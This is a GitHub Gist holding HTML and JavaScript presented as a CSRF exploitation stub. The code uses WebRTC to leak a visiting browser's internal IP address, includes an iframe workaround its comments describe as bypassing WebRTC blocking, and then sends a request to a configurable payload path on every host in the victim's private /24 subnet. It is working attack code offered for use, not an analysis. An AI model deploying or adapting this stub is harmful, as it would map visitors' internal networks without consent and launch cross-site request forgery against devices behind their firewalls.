Last active
October 11, 2020 00:08
-
-
Save dxflatline/0cc5ecfb2c5d04d3f4fb3166462a8393 to your computer and use it in GitHub Desktop.
JS STUB full internal network test (useful for CSRF exploitation)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| //get the IP addresses associated with an account | |
| function getIPs(callback) { | |
| //get the IP addresses associated with an accountfunction getIPs(callback){ | |
| var ip_dups = {}; | |
| //compatibility for firefox and chrome | |
| var RTCPeerConnection = window.RTCPeerConnection | |
| || window.mozRTCPeerConnection | |
| || window.webkitRTCPeerConnection; | |
| var useWebKit = !!window.webkitRTCPeerConnection; | |
| //bypass naive webrtc blocking using an iframe | |
| if(!RTCPeerConnection){ | |
| //NOTE: you need to have an iframe in the page right above the script tag | |
| // | |
| //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe> | |
| //<script>...getIPs called in here... | |
| // | |
| var win = iframe.contentWindow; | |
| RTCPeerConnection = win.RTCPeerConnection | |
| || win.mozRTCPeerConnection | |
| || win.webkitRTCPeerConnection; | |
| useWebKit = !!win.webkitRTCPeerConnection; | |
| } | |
| //minimal requirements for data connection | |
| var mediaConstraints = { | |
| optional: [{RtpDataChannels: true}] | |
| }; | |
| //firefox already has a default stun server in about:config | |
| // media.peerconnection.default_iceservers = | |
| // [{"url": "stun:stun.services.mozilla.com"}] | |
| var servers = undefined; | |
| //add same stun server for chrome | |
| if(useWebKit) | |
| servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; | |
| //construct a new RTCPeerConnection | |
| var pc = new RTCPeerConnection(servers, mediaConstraints); | |
| function handleCandidate(candidate){ | |
| //match just the IP address | |
| var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/ | |
| var ip_addr = ip_regex.exec(candidate)[1]; | |
| //remove duplicates | |
| if(ip_dups[ip_addr] === undefined) | |
| callback(ip_addr); | |
| ip_dups[ip_addr] = true; | |
| } | |
| //listen for candidate events | |
| pc.onicecandidate = function(ice){ | |
| //skip non-candidate events | |
| if(ice.candidate) | |
| handleCandidate(ice.candidate.candidate); | |
| }; | |
| //create a bogus data channel | |
| pc.createDataChannel(""); | |
| //create an offer sdp | |
| pc.createOffer(function(result){ | |
| //trigger the stun server request | |
| pc.setLocalDescription(result, function(){}, function(){}); | |
| }, function(){}); | |
| //wait for a while to let everything done | |
| setTimeout(function(){ | |
| //read candidate info from local description | |
| var lines = pc.localDescription.sdp.split('\n'); | |
| lines.forEach(function(line){ | |
| if(line.indexOf('a=candidate:') === 0) | |
| handleCandidate(line); | |
| }); | |
| }, 1000); | |
| } | |
| getIPs( | |
| function(ip){ | |
| // Log the identified internal IP | |
| console.log(ip); | |
| // Extract a /24 portion and execute an attack | |
| var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./ | |
| var exploit_URI_payload = "/test"; | |
| if (local_regex.exec(ip) != null) { | |
| var subnet = local_regex.exec(ip)[0]; | |
| for (node=1; node<256; node++) { | |
| var url = 'http://' + subnet + node + exploit_URI_payload; | |
| var oReq = new XMLHttpRequest(); | |
| oReq.open("get",url,true) | |
| oReq.send(); | |
| } | |
| } | |
| } | |
| ); | |
| </script> | |
| <H1>test</H1></html> |
Author
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Can't remember the original source..
Modified a bit